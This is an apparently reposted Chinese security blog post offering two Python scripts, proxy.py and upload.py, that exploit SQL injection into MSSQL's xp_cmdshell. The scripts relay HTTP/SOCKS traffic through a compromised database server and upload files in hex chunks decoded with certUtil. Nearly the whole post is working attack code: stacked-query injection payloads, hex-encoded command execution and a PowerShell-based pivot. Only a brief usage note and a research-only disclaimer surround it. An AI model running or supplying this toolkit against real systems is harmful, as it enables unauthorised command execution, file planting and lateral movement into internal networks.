一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本,用于在站酷分离且不出网SQL注入进行代理。
1、upload.py 能够方便的通过SQL注入上传文件
2、proxy.py 能够进行代理,但是在使用前记得更改 exec_xp_cmdshell 函数里的注入方法,根据自己的注入点灵活变通
- 支持 HTTPS 代理
- 支持 Socks 代理
proxy.py
import base64import binasciiimport requestsfrom flask import Flask, request, make_responseimport reregex = 'MSSQL Proxy(.+?)MSSQL Proxy'script_path = "C:/Users/MSSQLSERVER/AppData/Local/Temp/mssql_proxy.ps1"app = Flask(__name__)def exec_xp_cmdshell(cmd):url = 'http://10.37.129.4/sql.php'payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(cmd.encode()).decode()requests.post(url, data={'id': "1'; DELETE FROM sqlmapoutput-- ZKN"})requests.post(url, data={"id": payload})res = requests.post(url, data={"id": "1' UNION ALL SELECT NULL, 'MSSQL Proxy' + ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) + 'MSSQL Proxy',NULL FROM sqlmapoutput ORDER BY id-- ZKN"})return ''.join(re.findall(regex, res.text))def send_package(ip, port, data):cmd = "powershell {script_path} -remoteHost {ip} -port {port} -sendData {data}".format(script_path=script_path, ip=ip, port=port, data=data)print(cmd)return exec_xp_cmdshell(cmd)def clean_up_response(response):response = binascii.unhexlify(response.strip().encode()).decode()headers = response.split('rnrn')[0]body = 'rnrn'.join(response.split('rnrn')[1:]).strip()res = make_response(body)res.status = ' '.join(headers.split('rn')[0].split(' ')[1:])for header in headers.split('rn')[1:]:res.headers[header.split(':')[0]] = ':'.join(header.split(':')[1:])return res@app.before_requestdef before_request():if request.method == 'CONNECT':returnpackage = '{method} {path} {version}rn'.format(method=request.method,path=request.full_path,version=request.environ['SERVER_PROTOCOL']).encode()host = ''for k, v in dict(request.headers).items():if k.upper() == 'Connection'.upper():package += b'Connection: closern'continueif k.upper() == 'HOST':host = vpackage += '{k}: {v}rn'.format(k=k, v=v).encode()package += b'rn'package += request.stream.read()# print(package)if not host:return "HostNotFoundr--MSSQL Proxy"if len(host.split(':')) > 1:ip, port = host.split(':')else:ip, port = host, 80response = send_package(ip, port, base64.b64encode(package).decode())if response.strip() == 'FAILED':return "Failedr--MSSQL Proxy", 902return clean_up_response(response)if __name__ == '__main__':app.run(debug=True, host='0.0.0.0', port=4000)
upload.py
import binasciiimport sysimport requestsdef exec_xp_cmdshell(cmd):url = 'http://10.37.129.4/sql.php'payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(cmd.encode()).decode()requests.post(url, data={"id": payload})def main():if len(sys.argv) < 3:print("Usage: python3 upload.py local_file_to_read remote_path_to_save")sys.exit(1)cmd = '''>>"{path}" set /p="{content}"<nul'''file = open(sys.argv[1], 'rb')path_to_save = sys.argv[2]exec_xp_cmdshell('cd . > "{}"'.format(path_to_save + '.tmp'))while 1:content = file.read(512)payload = cmd.format(path=path_to_save + '.tmp', content=binascii.hexlify(content).decode())exec_xp_cmdshell(payload)if len(content) < 512:breakexec_xp_cmdshell('certUtil -decodehex "{old_path}" "{new_path}"'.format(old_path=path_to_save + '.tmp', new_path=path_to_save))exec_xp_cmdshell('del "{}"'.format(path_to_save + '.tmp'))print('Uploaded successfully!')if __name__ == '__main__':main()
原文始发于微信公众号(李白你好):一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本,用于在站酷分离且不出网SQL注入进行代理
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论